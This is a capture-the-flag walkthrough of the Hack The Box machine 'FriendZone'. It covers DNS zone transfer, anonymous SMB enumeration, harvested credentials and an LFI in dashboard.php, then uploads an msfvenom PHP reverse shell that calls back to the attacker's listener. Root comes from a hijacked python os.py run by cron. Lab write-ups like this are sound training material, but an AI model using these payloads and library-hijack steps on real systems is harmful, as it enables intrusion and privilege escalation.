FriendZone

FriendZone is a easy HTB lab that focuses on DNS enumeration, injection payloads and privilege escalation. In this walkthrough, we will go over the process of exploiting the services and gaining access to the root user.

Recon

The first step in any penetration testing process is reconnaissance. We can start by running nmap scan on the target machine to identify open ports and services.

$ sudo nmap -p- -sV -sC 10.129.41.205

Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-10 22:44 GMT
Nmap scan report for 10.129.41.205
Host is up (0.092s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a96824bc971f1e54a58045e74cd9aaa0 (RSA)
|   256 e5440146ee7abb7ce91acb14999e2b8e (ECDSA)
|_  256 004e1a4f33e8a0de86a6e42a5f84612b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-title: 404 Not Found
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-01-10T22:46:26
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2024-01-11T00:46:26+02:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.91 seconds

Also from enumerating the website, we got following email info@friendzoneportal.red from the website.

Based on this and the nmap output, let's check we can get more domains with zone transfer.

$ dig axfr friendzone.red @10.129.41.205

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> axfr friendzone.red @10.129.41.205
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 89 msec
;; SERVER: 10.129.41.205#53(10.129.41.205) (TCP)
;; WHEN: Wed Jan 10 22:57:36 GMT 2024
;; XFR size: 8 records (messages 1, bytes 289)

Adding new domains found to /etc/hosts.

sudo tee --append /etc/hosts <<< "10.129.41.205 uploads.friendzone.red hr.friendzone.red administrator1.friendzone.red friendzone.red"

Enumerating the SMB shares:

IP=10.129.41.205;
$ sudo crackmapexec smb $IP -u '' -p '' --shares;

SMB         10.129.41.205   445    FRIENDZONE       [*] Windows 6.1 (name:FRIENDZONE) (domain:) (signing:False) (SMBv1:True)
SMB         10.129.41.205   445    FRIENDZONE       [+] \: 
SMB         10.129.41.205   445    FRIENDZONE       [+] Enumerated shares
SMB         10.129.41.205   445    FRIENDZONE       Share           Permissions     Remark
SMB         10.129.41.205   445    FRIENDZONE       -----           -----------     ------
SMB         10.129.41.205   445    FRIENDZONE       print$                          Printer Drivers
SMB         10.129.41.205   445    FRIENDZONE       Files                           FriendZone Samba Server Files /etc/Files
SMB         10.129.41.205   445    FRIENDZONE       general         READ            FriendZone Samba Server Files
SMB         10.129.41.205   445    FRIENDZONE       Development     READ,WRITE      FriendZone Samba Server Files
SMB         10.129.41.205   445    FRIENDZONE       IPC$                            IPC Service (FriendZone server (Samba, Ubuntu))

Reading the data present in general SMB share.

$ sudo smbclient -N \\\\$IP\\general -U '';
smb: \> get creds.txt

Reading the creds.txt from the SMB share.

$ cat creds.txt 
creds for the admin THING:

admin:WORKWORKH*********@#

https://administrator1.friendzone.red/ has login screen where we can use this credentials. After that we find different urls but finally we got injection using https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp and https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login.

User

Preparing the reverse shell that we can put in the Development SMB which we have write access on.

$ msfvenom -p php/reverse_php LHOST=10.10.14.140 LPORT=4444 -f raw > rev_shell.php

$ sudo smbclient -N \\\\10.129.41.234\\development -U 'admin%WORKWORKH*********@#';
smb> put rev_shell.php

Opening the pages https://administrator1.friendzone.red/dashboard.php?image_id=../../../Development/c.jpg&pagename=/etc/Development/rev_shell gives reverse shell.

$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.41.234.
Ncat: Connection from 10.129.41.234:52164.
id   
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enumerating the machine and we get the following information available to us in conf file:

$ cat mysql_data.conf

for development process this is the mysql creds for user friend
db_user=friend
db_pass=*********!0.213$
db_name=FZ

Logging in with credentials provided and getting the user flag:

$ ssh friend@10.129.41.234
*********!0.213$

$ cat user.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~

Privilege Escalation

Investigating using pspy, we can find that root is actually invoking the reporter.py file.

2024/01/11 05:00:01 CMD: UID=0     PID=17332  | /usr/bin/python /opt/server_admin/reporter.py 
2024/01/11 05:00:01 CMD: UID=0     PID=17331  | /bin/sh -c /opt/server_admin/reporter.py 
2024/01/11 05:00:01 CMD: UID=0     PID=17330  | /usr/sbin/CRON -f

using linpeas.sh we found that apart from the files in the share we have /usr/lib/python2.7/os.py.

Updated the code in /usr/lib/python2.7/os.py to execute system("cp /root/root.txt /home/friend/dummy.txt")

Getting the flag:

~$ cat dummy.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~